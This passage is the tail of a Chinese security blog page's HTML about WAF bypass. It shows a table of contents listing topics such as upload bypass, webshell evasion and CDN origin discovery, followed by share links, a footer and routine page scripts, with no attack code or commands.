toc-level-5"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E8%BF%87%E6%BB%A4%E4%BD%8D%E7%BD%AE"><span class="toc-number">5.2.1.</span> <span class="toc-text">常见过滤位置</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E8%BF%87%E6%BB%A4%E5%87%BD%E6%95%B0-%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-number">5.2.2.</span> <span class="toc-text">常见过滤函数&amp;关键字</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#SQLServerTricks"><span class="toc-number">5.2.3.</span> <span class="toc-text">SQLServerTricks</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WAF%E5%B1%82bypass"><span class="toc-number">5.3.</span> <span class="toc-text">WAF层bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%BB%E8%BE%91bypass"><span class="toc-number">5.3.1.</span> <span class="toc-text">逻辑bypass</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%80%A7%E8%83%BDbypass"><span class="toc-number">5.3.2.</span> <span class="toc-text">性能bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%80%A7%E8%83%BD%E6%A3%80%E6%B5%8Bbypass"><span class="toc-number">5.3.2.1.</span> <span class="toc-text">性能检测bypass</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%80%A7%E8%83%BD%E8%B4%9F%E8%BD%BDbypass"><span class="toc-number">5.3.2.2.</span> <span class="toc-text">性能负载bypass</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#fuzz-bypass"><span class="toc-number">5.3.3.</span> <span class="toc-text">fuzz bypass</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%99%BD%E5%90%8D%E5%8D%95Bypass"><span class="toc-number">5.3.4.</span> <span class="toc-text">白名单Bypass</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%8A%E4%BC%A0Bypass"><span class="toc-number">5.4.</span> <span class="toc-text">上传Bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#WAF%E6%A3%80%E6%9F%A5%E4%BD%8D%E7%BD%AE"><span class="toc-number">5.4.1.</span> <span class="toc-text">WAF检查位置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%B9%E5%99%A8%E7%89%B9%E6%80%A7"><span class="toc-number">5.4.2.</span> <span class="toc-text">容器特性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E7%89%B9%E6%80%A7"><span class="toc-number">5.4.3.</span> <span class="toc-text">系统特性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WAF%E7%BC%BA%E9%99%B7"><span class="toc-number">5.4.4.</span> <span class="toc-text">WAF缺陷</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87trick"><span class="toc-number">5.4.5.</span> <span class="toc-text">一些上传绕过trick</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E6%83%85%E5%86%B5bypass"><span class="toc-number">5.5.</span> <span class="toc-text">其他情况bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypass-%E8%8F%9C%E5%88%80%E8%BF%9E%E6%8E%A5%E6%8B%A6%E6%88%AA"><span class="toc-number">5.5.1.</span> <span class="toc-text">Bypass 菜刀连接拦截</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#webshell-%E5%85%8D%E6%9D%80"><span class="toc-number">5.5.2.</span> <span class="toc-text">webshell 免杀</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypass-%E7%A6%81%E6%AD%A2%E6%89%A7%EF%A8%88%E7%A8%8B%E5%BA%8F"><span class="toc-number">5.5.3.</span> <span class="toc-text">Bypass 禁止执行程序</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypass-CDN%E6%9F%A5%E6%89%BE%E5%8E%9FIP"><span class="toc-number">5.5.4.</span> <span class="toc-text">Bypass CDN查找原IP</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">5.6.</span> <span class="toc-text">参考</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%91%E9%80%81%E5%88%B0%E7%9C%8B%E4%B8%80%E7%9C%8B"><span class="toc-number">5.6.1.</span> <span class="toc-text">发送到看一看</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&text=WAF绕过"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&title=WAF绕过"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&is_video=false&description=WAF绕过"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=WAF绕过&body=Check out this article: https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&title=WAF绕过"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&title=WAF绕过"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&title=WAF绕过"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&title=WAF绕过"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&name=WAF绕过&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&t=WAF绕过"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2026
    John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/WHOAMI-xiaoyu">Projects</a></li><!--
     --><!--
       --><li><a href="/links/">Links</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
